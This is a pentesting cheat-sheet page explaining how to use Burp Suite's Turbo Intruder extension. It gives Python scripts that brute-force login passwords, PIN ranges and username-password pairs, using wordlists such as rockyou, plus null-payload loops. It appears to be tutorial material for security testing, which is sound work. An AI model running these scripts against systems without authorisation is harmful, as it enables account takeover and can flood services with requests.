Turbo Intruder in Burp Suite

Others

Apache ActiveMQ Pentesting

Apache Tomcat Pentesting

Apache Zeppelin Pentesting

Atlassian Confluence Pentesting

Bookmarklet Attack

Broken Link Hijacking

Browser in the Browser (BITB) Attack

CGI Pentesting

Cacti Pentesting

Captcha Bypass with OCR

ClipBucket Pentesting

Code Deobfuscation

Codiad Pentesting

Dompdf RCE

Dump Git Repository from Website

Extract Web Browser Passwords

GhostScript Pentesting

Go SSTI

Grafana Pentesting

HTML Smuggling

HashiCorp Consul Pentesting

Icinga Web Pentesting

JBOSS Pentesting

JWT (Json Web Token) Pentesting

Java RMI Pentesting

Jenkins Pentesting

LimeSurvey Pentesting

Log4j Pentesting

OpenCATS Pentesting

PHP RCE Cheat Sheet

PHP Srand Time Abusing

PHP hash_hmac Bypass

Restaurant Management System (RMS) Pentesting

TeamCity Pentesting

Tiny File Manager Pentesting

Web Browser Settings for Pentesting

Web PHP Pentesting

WebAnno Pentesting

WebDAV Pentesting

WebSocket Pentesting

Webmin Pentesting

Turbo Intruder in Burp Suite

Last modified: 2023-08-14

Turbo Intruder is the Burp Suite extension for brute forcing or fuzzing to websites.

Using Single Parameter

Set “%s” to the parameter for brute force.
For example, set %s as the value of password then we can brute force to password.

POST /login HTTP/1.1
...

username=admin&password=%s

Here is the Python cheat sheet. We can use either code depending on the situation.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=5,
                        pipeline=False
                        )

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255)
    for i in range(0, 255):
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop)
    i = 0
    while i < 1:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    if interesting:
        table.add(req)

Using Multiple Parameters

In addition to simple parameter, we can apply multiple parameters e.g. username and password.

POST /login HTTP/1.1
...

username=%s&password=%s

Here is the Python script. We need to apply multiple words for each parameter as below.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=100,
                        pipeline=False)

    # Set multiple words for parameters.
    for word1 in open('/path/to/usernames'):
        for word2 in open('/path/to/passwords'):
            engine.queue(target.req, [word1.rstrip(), word2.rstrip()])


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)

Method

Security Risk

Cookie

CMS

Framework

Template Engine

API

Cloud

Microsoft

Tool

Others

Turbo Intruder in Burp Suite

Using Single Parameter

Using Multiple Parameters

ON THIS PAGE